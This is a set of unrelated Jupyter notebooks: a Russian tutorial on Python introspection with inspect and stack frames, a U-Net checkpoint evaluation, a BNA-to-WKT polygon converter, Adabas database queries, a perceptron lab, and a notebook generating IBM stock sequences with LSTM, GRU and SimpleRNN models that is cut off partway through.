<td><p>\__name__</p></td>
<td><p>name with which this
method was defined</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__func__</p></td>
<td><p>function object
containing implementation
of method</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__self__</p></td>
<td><p>instance to which this
method is bound, or
<code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__module__</p></td>
<td><p>name of module in which
this method was defined</p></td>
</tr>
<tr class="row-even"><td><p>function</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__name__</p></td>
<td><p>name with which this
function was defined</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__code__</p></td>
<td><p>code object containing
compiled function
<a class="reference internal" href="../glossary.html#term-bytecode"><span class="xref std std-term">bytecode</span></a></p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__defaults__</p></td>
<td><p>tuple of any default
values for positional or
keyword parameters</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__kwdefaults__</p></td>
<td><p>mapping of any default
values for keyword-only
parameters</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__globals__</p></td>
<td><p>global namespace in which
this function was defined</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__annotations__</p></td>
<td><p>mapping of parameters
names to annotations;
<code class="docutils literal notranslate"><span class="pre">"return"</span></code> key is
reserved for return
annotations.</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__module__</p></td>
<td><p>name of module in which
this function was defined</p></td>
</tr>
<tr class="row-odd"><td><p>traceback</p></td>
<td><p>tb_frame</p></td>
<td><p>frame object at this
level</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>tb_lasti</p></td>
<td><p>index of last attempted
instruction in bytecode</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>tb_lineno</p></td>
<td><p>current line number in
Python source code</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>tb_next</p></td>
<td><p>next inner traceback
object (called by this
level)</p></td>
</tr>
<tr class="row-odd"><td><p>frame</p></td>
<td><p>f_back</p></td>
<td><p>next outer frame object
(this frame’s caller)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>f_builtins</p></td>
<td><p>builtins namespace seen
by this frame</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>f_code</p></td>
<td><p>code object being
executed in this frame</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>f_globals</p></td>
<td><p>global namespace seen by
this frame</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>f_lasti</p></td>
<td><p>index of last attempted
instruction in bytecode</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>f_lineno</p></td>
<td><p>current line number in
Python source code</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>f_locals</p></td>
<td><p>local namespace seen by
this frame</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>f_trace</p></td>
<td><p>tracing function for this
frame, or <code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
<tr class="row-odd"><td><p>code</p></td>
<td><p>co_argcount</p></td>
<td><p>number of arguments (not
including keyword only
arguments, * or **
args)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_code</p></td>
<td><p>string of raw compiled
bytecode</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_cellvars</p></td>
<td><p>tuple of names of cell
variables (referenced by
containing scopes)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_consts</p></td>
<td><p>tuple of constants used
in the bytecode</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_filename</p></td>
<td><p>name of file in which
this code object was
created</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_firstlineno</p></td>
<td><p>number of first line in
Python source code</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_flags</p></td>
<td><p>bitmap of <code class="docutils literal notranslate"><span class="pre">CO_*</span></code> flags,
read more <a class="reference internal" href="#inspect-module-co-flags"><span class="std std-ref">here</span></a></p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_lnotab</p></td>
<td><p>encoded mapping of line
numbers to bytecode
indices</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_freevars</p></td>
<td><p>tuple of names of free
variables (referenced via
a function’s closure)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_posonlyargcount</p></td>
<td><p>number of positional only
arguments</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_kwonlyargcount</p></td>
<td><p>number of keyword only
arguments (not including
** arg)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_name</p></td>
<td><p>name with which this code
object was defined</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_names</p></td>
<td><p>tuple of names of local
variables</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_nlocals</p></td>
<td><p>number of local variables</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_stacksize</p></td>
<td><p>virtual machine stack
space required</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_varnames</p></td>
<td><p>tuple of names of
arguments and local
variables</p></td>
</tr>
<tr class="row-odd"><td><p>generator</p></td>
<td><p>\__name__</p></td>
<td><p>name</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>gi_frame</p></td>
<td><p>frame</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>gi_running</p></td>
<td><p>is the generator running?</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>gi_code</p></td>
<td><p>code</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>gi_yieldfrom</p></td>
<td><p>object being iterated by
<code class="docutils literal notranslate"><span class="pre">yield</span> <span class="pre">from</span></code>, or
<code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
<tr class="row-odd"><td><p>coroutine</p></td>
<td><p>\__name__</p></td>
<td><p>name</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>cr_await</p></td>
<td><p>object being awaited on,
or <code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>cr_frame</p></td>
<td><p>frame</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>cr_running</p></td>
<td><p>is the coroutine running?</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>cr_code</p></td>
<td><p>code</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>cr_origin</p></td>
<td><p>where coroutine was
created, or <code class="docutils literal notranslate"><span class="pre">None</span></code>. See
<a class="reference internal" href="sys.html#sys.set_coroutine_origin_tracking_depth" title="sys.set_coroutine_origin_tracking_depth"><code class="xref py py-func docutils literal notranslate"><span class="pre">sys.set_coroutine_origin_tracking_depth()</span></code></a></p></td>
</tr>
<tr class="row-even"><td><p>builtin</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__name__</p></td>
<td><p>original name of this
function or method</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__self__</p></td>
<td><p>instance to which a
method is bound, or
<code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
</tbody>
</table>
## Доступ к глобальным и локальным переменным
```
g = 10
def some_function(a=5):
b = 27
print(locals())
print()
print(globals())
some_function()
```
# Модуль inspect
Этот модуль позволяет получать информацию об объектах в runtime. Иногда это бывает полезно =). Создадим несколько объектов, на которых рассмотрим возможности inspect: https://www.journaldev.com/19946/python-inspect-module
```
def module_funct(arg1, arg2 = 'default', *args):
"""This is a module-level function."""
local_var = arg1 * 3
return local_var
class X(object):
"""Definition for X class."""
def __init__(self, name):
self.name = name
def get_name(self):
"Returns the name of the instance."
return self.name
x_obj = X('sample_instance')
class Y(X):
"""This is the Y class,
child of X class.
"""
# This method is not part of X class.
def do_something(self):
"""Anything can be done here."""
def get_name(self):
"Overrides version from X"
return 'Y(' + self.name + ')'
```
Этот же код содержится в файле sample.py, который лежит в этой же папке. Будем рассматривать этот файл как модуль. С помощью `inspect.getmemebrs` можем посмотреть, какие объекты содержит этот модуль.
```
import inspect
import sample
from pprint import pprint
for name, data in inspect.getmembers(sample):
if name.startswith('__'):
continue
print(f'{name} : {data!r}')
```
Можем посмотреть только классы:
```
for key, data in inspect.getmembers(sample, inspect.isclass):
print('{} : {!r}'.format(key, data))
```
Или методы в отдельном классе:
```
pprint(inspect.getmembers(sample.X, inspect.isfunction))
```
Обратите внимание, мы увидели именно методы класса, не bound methods объекта! Чтобы посмотреть, что есть внутри объекта, нам нужно его прежде инстанцировать.
```
x = sample.X(name='inspect_getmembers')
pprint(inspect.getmembers(x, inspect.ismethod))
```
Можем получить docstring:
```
print('X.__doc__:')
print(sample.X.__doc__)
print()
print('getdoc(X):')
print(inspect.getdoc(sample.X))
```
Можно даже посмотреть исходный код сущности =)
```
print(inspect.getsource(sample.Y))
print(inspect.getsource(sample.Y.get_name))
```
### Inspect функций:
```
def foo(a, *, b:int, **kwargs):
pass
sig = inspect.signature(foo)
print(sig)
print(sig.parameters['b'])
print(sig.parameters['b'].annotation)
```
Кроме информации о самой функции, можно посмотреть, с какими аргументами она будет вызвана, если ее вызвать:
```
from inspect import getcallargs
def f(a, b=1, *pos, **named):
pass
print(getcallargs(f, 1, 2, 3))
print(getcallargs(f, a=2, x=4))
getcallargs(f)
```
### Inspect окружения:
```
print('getfile', inspect.getfile(sample.module_funct), sep='\t\t')
print('getmodule', inspect.getmodule(sample.module_funct), sep='\t')
print()
print('getsource', inspect.getsource(sample.module_funct), sep='\n')
print('signature', inspect.signature(sample.module_funct), sep='\t')
```
# Стек интерпретатора
## и абсолютно черная магия
Для описания стека исполняемого кода используются два основных понятия:
- __Стек вызовов__ - стек, хранящий информацию для возврата управления из подпрограмм (процедур, функций) в программу (или подпрограмму, при вложенных или рекурсивных вызовах) и/или для возврата в программу из обработчика прерывания (в том числе при переключении задач в многозадачной среде).
- __Стековый кадр (frame)__ - механизм передачи аргументов и выделения временной памяти (в процедурах языков программирования высокого уровня) с использованием системного стека; ячейка памяти в стеке.
В Python предусмотрены специальные объекты, которые хранят эти сущности: Traceback и Frame.
https://habr.com/ru/post/255239/
Traceback мы можем увидеть при выбросе исключения:
```
import requests
requests.get(None)
```
При отладке приложения нас могут интересовать, например, локальные переменные какой-то функции в момент исполнения. Когда мы получаем исключение, получить доступ к последнему фрейму достаточно легко:
```
import sys
tb = sys.last_traceback
tb
tb.tb_frame
tb.tb_frame.f_locals
```
Но каждый раз принудительно бросать исключение для того, чтобы что-то посмотреть, накладно. Нужно как-то по-другому получить ссылку на фрейм.
```
inspect.currentframe()
```
Это текущий фрейм. А что если мы хотим получить предыдущий по стеку вызовов фрейм? Для этого у нас есть метод `inspect.stack()`
```
def a(i):
if i < 3:
a(i + 1)
else:
frame = inspect.currentframe()
# пройдемся рекурсивно по всем предыдущим фреймам
while frame.f_back:
print("Название предыдущего фрейма:", frame.f_code.co_name)
frame = frame.f_back
print()
print(inspect.stack()[0])
print(inspect.stack()[1])
print(inspect.stack()[2])
print(inspect.stack()[3])
def b():
a(1)
b()
```
`inspect.stack()` возвращает стек вызовов вплоть до текущей функции. Через него можно смотреть информацию о предыдущих фреймах. Кстати, лямбды - это, конечно, тоже отдельные фреймы
```
import threading
threading.Thread(target=lambda: print(inspect.stack()[0])).run()
threading.Thread(target=lambda: print(inspect.stack()[1])).run()
threading.Thread(target=lambda: print(inspect.stack()[2])).run()
```
| github_jupyter |
## 1. Setup
```
import sys
sys.path.append('../..')
import config
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
import warnings
from neural_networks.unet import UNet
from neural_networks.net_utils import predict_density_maps_and_get_counts
from utils.data.data_generator import DataGenerator
from utils.evaluation.evaluation import evaluation_results_as_dict
from utils.evaluation.evaluation import evaluation_results_as_df
from utils.input_output.io import load_images_and_density_maps
from utils.input_output.io import read_json, write_json
from utils.input_output.io import load_gt_counts
%matplotlib inline
%load_ext autoreload
%autoreload 2
warnings.filterwarnings('ignore')
```
## 2. Load the dataset
```
params = {
'dim': config.IMG_DIM,
'batch_size': 1,
'patches_per_image': 1,
'density_map_multiplication_factor': config.DENSITY_MAP_MULTIPLICATION_FACTOR,
'shuffle': False,
'data_augmentation': False
}
train_generator = DataGenerator(config.DATASET_PATH, 'train', **params)
val_generator = DataGenerator(config.DATASET_PATH, 'val', **params)
test_generator = DataGenerator(config.DATASET_PATH, 'test', **params)
train_gt_counts = load_gt_counts(config.TRAIN_GT_COUNT_PATH)
val_gt_counts = load_gt_counts(config.VAL_GT_COUNT_PATH)
test_gt_counts = load_gt_counts(config.TEST_GT_COUNT_PATH)
```
### Select the checkpoint file that you want to test/evaluate
```
checkpoint_filenames = sorted(os.listdir(config.CHECKPOINTS_PATH))
print(checkpoint_filenames)
for checkpoint_idx in range(30, 50, 1):
selected_checkpoint_filename = checkpoint_filenames[checkpoint_idx]
print(f'selected checkpoint_filename: {selected_checkpoint_filename}')
epoch = selected_checkpoint_filename.split('.')[1].split('-')[0]
print('epoch:', epoch)
# Set epoch and val loss
CHECKPOINT_FILENAME = f'{config.CHECKPOINTS_PATH}/{selected_checkpoint_filename}'
QUANTITATIVE_RESULTS_PATH = f'./{config.SUB_EXPERIMENT_NAME}/results/quantitative/epoch_{epoch}'
!rm -rf $QUANTITATIVE_RESULTS_PATH
os.makedirs(QUANTITATIVE_RESULTS_PATH)
## 3. Load the best model
model = UNet(pretrained_weights=CHECKPOINT_FILENAME)
train_pred_counts = predict_density_maps_and_get_counts(model, train_generator,
config.DENSITY_MAP_MULTIPLICATION_FACTOR)
val_pred_counts = predict_density_maps_and_get_counts(model, val_generator,
config.DENSITY_MAP_MULTIPLICATION_FACTOR)
test_pred_counts = predict_density_maps_and_get_counts(model, test_generator,
config.DENSITY_MAP_MULTIPLICATION_FACTOR)
## 4. Predict and evaluate
train_results = evaluation_results_as_dict(train_gt_counts, train_pred_counts, 'train')
val_results = evaluation_results_as_dict(val_gt_counts, val_pred_counts, 'val')
test_results = evaluation_results_as_dict(test_gt_counts, test_pred_counts, 'test')
df = evaluation_results_as_df(train_results, val_results, test_results,
config.ARCHITECTURE_NAME,
config.SUB_EXPERIMENT_NAME,
config.DATASET_NAME)
df.to_csv(f'{QUANTITATIVE_RESULTS_PATH}/results.csv', index=True)
```
| github_jupyter |
# Converting Surfer Atlas .BNA (ASCII DAT) file to a Vector Layer
We have an ASCII file from Surfer in the [BNA format](http://surferhelp.goldensoftware.com/subsys/subsys_gsibna_hid_gsibna_filedesc.htm) defining every building ground plan as a polygon by listing its vertices. Hence the entry for a given building is the building number followed by the number of vertices of its boundary and the rooftop elevation (assumed flat), followed by a list of the (X,Y) coordinates of each one of the vertices of its boundary. As an example the entry for building number 186 is given below:
The sequence means: Building number 105 is a polygon with 6 vertices and its rooftop elevation is 54.69 m (MSL). The (X,Y) co-ordinates of the given 6 vertices follow in the four next lines.
```
105 6 54.69
1651.562500 4787.500000
1652.125000 4785.000000
1649.062500 4787.000000
1650.750000 4789.500000
1653.812500 4787.500000
1652.125000 4785.000000
106 6 58.98
1555.875000 4755.500000
1558.000000 4753.000000
1553.187500 4753.500000
1553.687500 4757.500000
1558.500000 4757.000000
1558.000000 4753.000000
107 8 62.32
1537.062500 4741.500000
1532.062500 4737.000000
1532.062500 4744.500000
1539.625000 4744.500000
1539.437500 4742.000000
1542.062500 4742.000000
1541.875000 4737.000000
1532.062500 4737.000000
```
We can creat a CSV with the polygon geometry stored as text in WKT format. QGIS can read this format easily and display the data.
```
input = 'Buildings.dat'
output = 'Buildings.csv'
data = []
with open(input, 'r') as f:
for line in f:
# Get number of verticies from the first line
fid, numvertices, elev = line.split()
coordinates = []
# Skip ahead number of lines equal to number of vertices and save the coordinates
for x in range(int(numvertices)):
x, y = f.readline().split()
coordinates.append(('{} {}'.format(x,y)))
# Discard first coordinate which is the centroid
wkt = 'POLYGON (({}))'.format(','.join(coordinates[1:]))
data.append({'fid': int(fid), 'elev': float(elev), 'wkt': wkt})
import csv
with open(output, 'w') as csvfile:
fieldnames = ['fid', 'elev', 'wkt']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for row in data:
writer.writerow(row)
```
The result is a CSV file that looks like this
```
fid,elev,wkt
2,127.69,"POLYGON ((627.187500 7781.000000,626.125000 7785.000000,629.062500 7786.000000,630.125000 7782.000000,627.187500 7781.000000))"
3,164.42,"POLYGON ((824.125000 7675.500000,822.687500 7679.000000,826.000000 7680.500000,827.437500 7677.000000,824.125000 7675.500000))"
4,171.19,"POLYGON ((840.125000 7640.500000,836.812500 7652.000000,842.937500 7654.000000,846.250000 7642.500000,840.125000 7640.500000))"
```
The resulting CSV can be imported using the *Delimited Text* tab in the QGIS Data Source Manager using **WKT** field as *Geometry field*

The point layers loads in QGIS. Since the data also has an `elev` attribute, we can style it using the **2.5D** renderer in QGIS.

| github_jupyter |
```
import json
from adabas.api import *
from adabas.datamap import *
from datetime import date
mask_date = lambda data, mask='%d-%m-%Y': date.fromordinal(int(data)-364).strftime(mask)
#campo elementar de um grupo periódico ou campo elementar múltiplo
def get_periodic(isn = 0 # isn a ser pesquisado
,gsn = '' # grupo short name ou elementar multiplo - FDT
,esn = '' # elementar short name - FDT
,lgn = '' # elementar long-name - DDM
,lsn = 0 # length elementar - DDM
,upk = '' # unpack para colunas packeadas '' or True
,scl = '' # scale or '' - DDM
,Int = '' # True para numéricos
):
ret = ''
try:
upk = ',U' if upk else ''
Str = '"'
a.cb.isn=isn
if scl or Int:
Int = 'int('
Str = ''
if scl:
scl = ') * .{0:>0{1}}'.format('1', scl)
else:
scl = ')'
a.fb.value='{}C,002,B.'.format(gsn)
a.get(isn=a.cb.isn)
if a.rb.value:
occ=int(a.rb.value.encode('hex') ) # count occurs group
exec ("row = Datamap('Rows', {})".format("String('{lg}{}', {l})," * occ).format(lg=lgn, *range(1,occ+1), l=lsn))
row.buffer = a.rb
a.fb.value='{}1-{},{}{}.'.format(esn, occ, lsn, upk)
a.get(isn=a.cb.isn)
ret = eval("""'"{}": [{}]'.format({})""".format( lgn, (Str+'{}'+Str+', ') * occ, ('{i}row.{ln}{}{sc}, '* occ).format(i=Int,ln=lgn,sc=scl,*range(1,occ+1))))
# ret = ret[:-3] + ']'
ret = ret.replace(', ]', ']')
except DatabaseError, (error,apa):
return error.split(':')[1]
return ret
#campo multiplo de um grupo periódico
def get_per_mult(isn = 0 # isn a ser pesquisado
,gsn = '' # grupo short name - FDT
,esn = '' # elementar short name - FDT
,lgn = '' # elementar long-name - DDM
,lsn = 0 # length elementar - DDM
,upk = '' # unpack para colunas packeadas '' or True
,scl = '' # scale or '' - DDM
,Int = '' # True para numéricos
):
ret = ''
try:
upk = ',U' if upk else ''
Str = '"'
a.cb.isn=isn
if scl or Int:
Int = 'int('
Str = ''
if scl:
scl = ') * .{0:>0{1}}'.format('1', scl)
else:
scl = ')'
lst = '['
a.fb.value='{}C,002,B.'.format(gsn)
a.get(isn=a.cb.isn)
if a.rb.value:
gocc=int(a.rb.value.encode('hex') ) # count occurs group
for o in range(1,gocc+1):
a.fb.value='{}{}C,002,B.'.format(esn,o)
a.get(isn=a.cb.isn)
if a.rb.value:
occ=int(a.rb.value.encode('hex') ) # count occurs elementar
exec ("row = Datamap('Rows', {})".format("String('{lg}{}', {l})," * occ).format(lg=lgn, *range(1,occ+1), l=lsn))
row.buffer = a.rb
a.fb.value='{}{}(1-{}),{}{}.'.format(esn, o, occ, lsn, upk)
a.get(isn=a.cb.isn)
ret = eval("""'[{}]'.format({})""".format((Str+'{}'+Str+', ') * occ, ('{i}row.{ln}{}{sc}, '* occ).format(i=Int,ln=lgn,sc=scl,*range(1,occ+1))))
lst += '{}, '.format(ret)
else:
break
except DatabaseError, (error,apa):
return error.split(':')[1]
return '"{}": {}]'.format(lgn, lst).replace(', ]', ']')
DBID=12;FNR=11
STARTISN=282
RCOUNT=5
row=Datamap('rows',
String('personnel_id', 8), # aa 1
String('first_name', 20), # ac 2
String('middle_name', 20), # ad 3
String('name', 20), # ae 4
String('birth', 6), # ah 5
String('country', 3), # al 6
String('area_code', 6), # an 7
String('phone', 15), # am 8
String('dept', 6), # ao 9
String('job_title', 25)) # ap 10
lines=''
extraline=''
alter=False
c1=Adabas(rbl=256,fbl=64,sbl=32,vbl=128,ibl=0)
c1.cb.dbid=DBID
c1.cb.fnr=FNR
c1.cb.cid='1010'
c1.fb.value='AA,AC,AD,AE,AH,6,U,AL,AN,AM,AO,AP.'
a=Adabas(rbl=256,fbl=64,sbl=32,vbl=128,ibl=0)
a.cb.dbid=DBID
a.cb.fnr=FNR
c1.cb.isn=STARTISN
# use emp Datamap on record buffer
row.buffer=c1.rb
row.offset=0
count=0
try:
for count in range(RCOUNT):
c1.readByIsn(getnext=1)
lines += """{}"{}": {}, "{}": "{}", "{}": "{}", "{}": "{}","""\
""""{}": "{}", "{}": "{}", "{}": "{}","""\
""""{}": "{}", "{}": "{}", "{}": "{}","""\
""""{}": "{}", {}, {}{}\n""".format("{"
,'isn' , c1.cb.isn
,'personnel_id', row.personnel_id
,'first_name' , row.first_name
,'middle_name' , row.middle_name
,'name' , row.name
,'birth' , mask_date(row.birth)
,'country' , row.country
,'area_code' , row.area_code
,'phone' , row.phone
,'dept' , row.dept
,'job_title' , row.job_title
,get_periodic(isn=c1.cb.isn, gsn='AQ', esn='AR', lgn='curr_code', lsn = 3)
,get_per_mult(isn=c1.cb.isn, gsn='AQ', esn='AT', lgn='bonus', lsn=9, upk=True, Int=True)
,"}")
lines+= 'Sequential Read by ISN returned '+str(count+1)+' record(s).'
except DataEnd:
extraline+= 'Sequential Read by ISN returned '+str(count)+' record(s).'
pass
except DatabaseError, (line, apa):
extraline+='Database Error:'+line
line = lines.splitlines()
line[:5]
parsed = json.loads(line[1].decode('utf-8'))
parsed
parsed['bonus']
```
| github_jupyter |
```
import numpy as np
```
#### In this lab, we will implement the perceptron algorithm for a single layer.

```
# Let's implement the algorithm on the AND logic function
a = np.array([[0,0,0],[0,1,0],[1,0,0],[1,1,1]]) # AND logic table
a
# This is the input
inputs = a[:,:2]
inputs
# and this the target
targets = a[:,2:]
targets
# set up the network size
# We need to know the shape of the weights matrix
# it is determined by the number of features in the input samples
# and the number of outputs in the samples
nIn = np.shape(inputs)[1]
nOut = np.shape(targets)[1]
nIn, nOut
# Initialise the weights to small (positive and negative) random numbers
# here we add one row to the weights matrix for the bias
weights = np.random.rand(nIn+1,nOut)*0.1-0.05
weights.shape
# Adding the bias to the inputs samples
nData = np.shape(inputs)[0] # number of samples
inputs = np.concatenate((inputs,-np.ones((nData,1))),axis=1)
inputs
# training loop
eta = 0.25 # the learning rate
nIterations = 10
for n in range(nIterations):
# Compute activations
activations = np.dot(inputs, weights)
# Threshold the activations
activations = np.where(activations>0,1,0)
# update the weights
weights -= eta*np.dot(np.transpose(inputs),activations-targets)
# now let's classify the inputs samples
outputs = np.dot(inputs,weights)
outputs = np.where(outputs>0,1,0)
outputs
# TODO: compute the accuracy
num_correct = np.sum(outputs == targets) # number of correct classifications
accuracy = float(num_correct) / nData # accuracy
accuracy
# TODO: compute the Confusion matrix
nClasses = 2 # here we have two classes only
cm = np.zeros((nClasses,nClasses))
for i in range(nClasses):
for j in range(nClasses):
cm[i,j] = np.sum(np.where(outputs==i,1,0)*np.where(targets==j,1,0))
# TDOD: can you test the implementation on the XOR logic function?
b = np.array([[0,0,0],[0,1,1],[1,0,1],[1,1,0]]) # XOR logic table
b
# Will we get 100% accuracies? if no, why?
inputs = b[:,:2]
targets = b[:,2:]
nIn = np.shape(inputs)[1]
nOut = np.shape(targets)[1]
weights = np.random.rand(nIn+1,nOut)*0.1-0.05
nData = np.shape(inputs)[0] # number of samples
inputs = np.concatenate((inputs,-np.ones((nData,1))),axis=1)
eta = 0.25 # the learning rate
nIterations = 10
for n in range(nIterations):
# Compute activations
activations = np.dot(inputs, weights)
# Threshold the activations
activations = np.where(activations>0,1,0)
# update the weights
weights -= eta*np.dot(np.transpose(inputs),activations-targets)
outputs = np.dot(inputs,weights)
outputs = np.where(outputs>0,1,0)
num_correct = np.sum(outputs == targets) # number of correct classifications
accuracy = float(num_correct) / nData # accuracy
accuracy
# the answer is that we cannot get 100% accurcies because
# the problem cannot be solved by one straight line (single layer
# perceptron gives a straight line soltuion)
# we will see how to solve it next week lab
```
| github_jupyter |
# Deep Learning on IBM Stocks
## The Data
We choose to analyse IBM history stock data which include about 13K records from the last 54 years. [From the year 1962 to this day]
Each record contains:
- Open price: The price in which the market in that month started at.
- Close price: The price in which the market in that month closed at.
- High Price: The max price the stock reached within the month.
- Low price: The min price the stock reached within the month.
- Volume: The max price the stock reached within the month.
- [Adjacent close price](https://marubozu.blogspot.co.il/2006/09/how-yahoo-calculates-adjusted-closing.html).
- Date: Day, Month and Year.
The main challenges of this project are:
- The limited data within a market that is changed by wide variety of things. In particular, things that we don't see in the raw data, like special accouncments on new technology.
- The historic data of stocks in a particular situation doesn't necessarily resolve the same outcome in the exact same situation a few years later.
- We wondered whether it is possible to actually find some features that will give us better accuracy than random.
This project is interesting because as everybody knows deep learning solved tasks that considered difficult even with pretty basic deep learning features.
And of course, If we find something useful when it comes to stock then good prediction = profit.
```
from pandas_datareader.data import DataReader
from datetime import datetime
import os
import pandas as pd
import random
import numpy as np
from keras.models import Sequential
from keras.layers.recurrent import LSTM,GRU,SimpleRNN
from keras.layers.core import Dense, Activation, Dropout
from sklearn.cross_validation import train_test_split
from sklearn.ensemble import RandomForestClassifier
import warnings
warnings.filterwarnings('ignore')
from keras.utils.np_utils import to_categorical
```
#### Load or Download the data
```
def get_data_if_not_exists(force=False):
if os.path.exists("./data/ibm.csv") and not force:
return pd.read_csv("./data/ibm.csv")
else:
if not os.path.exists("./data"):
os.mkdir("data")
ibm_data = DataReader('IBM', 'yahoo', datetime(1950, 1, 1), datetime.today())
pd.DataFrame(ibm_data).to_csv("./data/ibm.csv")
return pd.DataFrame(ibm_data).reset_index()
```
## Data Exploration
```
print "loading the data"
data = get_data_if_not_exists(force=True)
print "done loading the data"
print "data columns names: %s"%data.columns.values
print data.shape
data.head()
```
#### Data exploration highlights:
- The data contains 13,733 records.
- Each record reprsent one specific day.
- Each record contain: Date, Open, High, Low, Close, Volume and Adj Close.
# Creating sequence of close price from the stock data
Our motivation was trying to imitiate a a stock similiar to IBM stock.
### Feature extraction:
We'll use for our features only the closing price of the stock.
And the sequence generated will include only the closing price aswell.
```
def extract_features(items):
return [[item[4]] for item in items]
def extract_expected_result(item):
return [item[4]]
MAX_WINDOW = 5
def train_test_split(data, test_size=0.1):
"""
This just splits data to training and testing parts
"""
ntrn = int(round(len(data) * (1 - test_size)))
X, y = generate_input_and_outputs(data,extract_features,extract_expected_result)
X_train,y_train,X_test, y_test = X[:ntrn],y[:ntrn],X[ntrn:],y[ntrn:]
return X_train, y_train, X_test, y_test
def generate_input_and_outputs(data,extractFeaturesFunc=extract_features,expectedResultFunc=extract_expected_result):
step = 1
inputs = []
outputs = []
for i in range(0, len(data) - MAX_WINDOW, step):
inputs.append(extractFeaturesFunc(data.iloc[i:i + MAX_WINDOW].as_matrix()))
outputs.append(expectedResultFunc(data.iloc[i + MAX_WINDOW].as_matrix()))
return inputs, outputs
X_train,y_train, X_test, y_test = train_test_split(data,test_size=0.15)
```
### Distance metrics:
For our evaluation of the quality we used several distance metrics:
* Euclidean distance.
* Squared Euclidean distance.
* Chebyshev distance.
* Cosine distance.
```
import scipy.spatial.distance as dist
def distance_functions(generated_seq):
generated_sequence = np.asarray(generated_seq)
original_sequence = np.asarray(y_test)
print 'Euclidean distance: ', dist.euclidean(original_sequence, generated_sequence)
print 'Squared Euclidean distance: ', dist.sqeuclidean(original_sequence, generated_sequence)
print 'Chebyshev distance: ', dist.chebyshev(original_sequence, generated_sequence)
print 'Cosine distance: ', dist.cosine(original_sequence, generated_sequence)
return generated_sequence
def train_and_evaluate(model, model_name):
print 'Done building'
print 'Training...'
model.fit(X_train, y_train, batch_size=500, nb_epoch=500, validation_split=0.15,verbose=0)
print 'Generating sequence...'
generated_sequence = model.predict(X_test)
return distance_functions(generated_sequence)
```
### Training and Evaluation
We tried 3 different deep-learning algorithms:
* LSTM.
* GRU.
* SimpleRNN.
For each algorithm we generated a sequence, Measured its distance and plotted the given result with the original sequence.
```
layer_output_size1 = 128
print 'Building LSTM Model'
model = Sequential()
model.add(LSTM(layer_output_size1, return_sequences=False, input_shape=(MAX_WINDOW, len(X_train[0][0]))))
model.add(Dense(len(y_train[0]), input_dim=layer_output_size1))
model.add(Activation("linear"))
model.compile(loss="mean_squared_error", optimizer="rmsprop")
LSTM_seq = train_and_evaluate(model, 'LSTM')
print '----------------------'
print 'Building SimpleRNN Model'
model = Sequential()
model.add(SimpleRNN(layer_output_size1, return_sequences=False, input_shape=(MAX_WINDOW, len(X_train[0][0]))))
model.add(Dense(len(y_train[0]), input_dim=layer_output_size1))
model.add(Activation("linear"))
model.compile(loss="mean_squared_error", optimizer="rmsprop")
SimpleRNN_seq = train_and_evaluate(model, 'SimpleRNN')
print '----------------------'
print 'Building GRU Model'
